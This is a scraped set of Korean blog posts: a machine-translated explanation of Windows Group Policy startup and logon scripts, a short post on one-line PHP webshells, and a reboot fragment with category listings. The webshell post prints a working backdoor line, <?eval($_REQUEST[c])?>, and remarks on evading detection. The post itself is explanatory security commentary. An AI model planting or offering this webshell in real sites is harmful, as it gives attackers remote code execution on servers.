Windows 2000 및 XP에서 그룹 정책 스크립트 배포를위한 두 가지 옵션을 포함합니다 : 
Scripts (Startup/Shutdown): 스크립트 (시작 / 종료) : 
In the Group policy console (gpedit.msc) under 'Computer Configuration\Windows Settings', you can specify scripts that are to run when the computer starts up or shuts down. '컴퓨터 구성 \ Windows 설정'아래의 그룹 정책 콘솔 (gpedit.msc를)에서는 컴퓨터가 시작하거나 종료할 때 실행할 수있는 스크립트를 지정할 수 있습니다. Note: These scripts under Local System account. 참고 : 로컬 시스템 계정에서 이러한 스크립트. 

Scripts (Logon/Logoff): 스크립트 (로그온 / 로그오프) : 
In the Group policy console (gpedit.msc) under 'User Configuration\Windows Settings', you can specify scripts that are to run when the user logs on or logs off the computer. '사용자 구성 \ Windows 설정'아래의 그룹 정책 콘솔 (gpedit.msc를)에서는 사용자가 로그온하거나 컴퓨터 로그오프할 때 실행할 수있는 스크립트를 지정할 수 있습니다. These scripts run as User, not as Administrator. 이러한 스크립트는되지 관리자로, 사용자로 실행합니다. 


출처:
http://translate.google.co.kr/translate?hl=ko&langpair=en%7Cko&u=http://techsupt.winbatch.com/ts/T000001048F90.html
 

'windows' 카테고리의 다른 글

AD환경에서 pc명 변경  (0) 2012.05.19
윈도우 정품인증  (2) 2012.03.29
"ActiveDirectory 사용자 및 컴퓨터"-dsa.msc 실행이 안될때 win2008  (0) 2012.01.03
자동실행 레지스트리 경로  (0) 2011.12.11
IMAGE_THUNK_DATA32  (0) 2010.05.24
Posted by applicationlayer
:
<?eval($_REQUEST[c])?> 

최근에 발견하는 웹쉘은 거의 다 한줄짜리고 사용하는 함수는 eval뿐이다. 한동안 웹쉘이 종합선물세트마냥 많은 기능을 포함했다면 요즘엔 그런 기능들을 클라이언트에서 처리하는듯하다.
장단점이 있을거다 전자는 ids에서 탐지하기 어렵고 후자는 서버진단시에 발견하기 어렵다
당장에 eval함수를 제한하면 이런 방식의 웹쉘에서 안전할 수 있다. 그런데 eval을 대신할 수 있는 함수는 많다. 

'webhxxx > webshell' 카테고리의 다른 글

w3af asp webshell[수정]  (0) 2010.01.21
Posted by applicationlayer
:

윈도우를 재부팅한다-_-


'windows' 카테고리의 다른 글

윈도우 정품인증  (2) 2012.03.29
윈도 스크립트 자동실행  (0) 2012.01.10
자동실행 레지스트리 경로  (0) 2011.12.11
IMAGE_THUNK_DATA32  (0) 2010.05.24
Windows Data Types  (0) 2010.05.24
Posted by applicationlayer
: